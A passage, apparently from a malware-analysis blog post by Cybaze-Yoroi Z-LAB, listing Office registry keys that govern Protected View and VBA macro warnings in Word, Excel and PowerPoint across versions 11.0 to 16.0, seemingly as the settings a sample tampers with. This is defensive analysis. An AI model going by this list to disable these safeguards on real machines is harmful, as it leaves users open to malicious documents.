HKCU\Software\Microsoft\Office\12.0\PowerPoint\Security\ProtectedView\DisableAttachementsInPV
HKCU\Software\Microsoft\Office\12.0\PowerPoint\Security\ProtectedView\DisableInternetFilesInPV
HKCU\Software\Microsoft\Office\12.0\Word\Security\ProtectedView\DisableUnsafeLocationsInPV
HKCU\Software\Microsoft\Office\12.0\Word\Security\ProtectedView\DisableAttachementsInPV
HKCU\Software\Microsoft\Office\12.0\Word\Security\ProtectedView\DisableInternetFilesInPV
HKCU\Software\Microsoft\Office\11.0\Excel\Security\ProtectedView\DisableUnsafeLocationsInPV
HKCU\Software\Microsoft\Office\11.0\Excel\Security\ProtectedView\DisableAttachementsInPV
HKCU\Software\Microsoft\Office\11.0\Excel\Security\ProtectedView\DisableInternetFilesInPV
HKCU\Software\Microsoft\Office\11.0\PowerPoint\Security\ProtectedView\DisableUnsafeLocationsInPV
HKCU\Software\Microsoft\Office\11.0\PowerPoint\Security\ProtectedView\DisableAttachementsInPV
HKCU\Software\Microsoft\Office\11.0\PowerPoint\Security\ProtectedView\DisableInternetFilesInPV
HKCU\Software\Microsoft\Office\11.0\Word\Security\ProtectedView\DisableUnsafeLocationsInPV
HKCU\Software\Microsoft\Office\11.0\Word\Security\ProtectedView\DisableAttachementsInPV
HKCU\Software\Microsoft\Office\11.0\Word\Security\ProtectedView\DisableInternetFilesInPV
HKCU\Software\Microsoft\Office\16.0\Excel\Security\VBAWarnings
HKCU\Software\Microsoft\Office\15.0\Excel\Security\VBAWarnings
HKCU\Software\Microsoft\Office\14.0\Excel\Security\VBAWarnings
HKCU\Software\Microsoft\Office\12.0\Excel\Security\VBAWarnings
HKCU\Software\Microsoft\Office\11.0\Excel\Security\VBAWarnings
HKCU\Software\Microsoft\Office\16.0\PowerPoint\Security\VBAWarnings
HKCU\Software\Microsoft\Office\15.0\PowerPoint\Security\VBAWarnings
HKCU\Software\Microsoft\Office\14.0\PowerPoint\Security\VBAWarnings
HKCU\Software\Microsoft\Office\12.0\PowerPoint\Security\VBAWarnings
HKCU\Software\Microsoft\Office\11.0\PowerPoint\Security\VBAWarnings
HKCU\Software\Microsoft\Office\16.0\Word\Security\VBAWarnings
HKCU\Software\Microsoft\Office\15.0\Word\Security\VBAWarnings
HKCU\Software\Microsoft\Office\14.0\Word\Security\VBAWarnings
HKCU\Software\Microsoft\Office\12.0\Word\Security\VBAWarnings
HKCU\Software\Microsoft\Office\11.0\Word\Security\VBAWarnings

This blog post was authored by Luigi Martire, Davide Testa and Luca Mella of Cybaze-Yoroi Z-LAB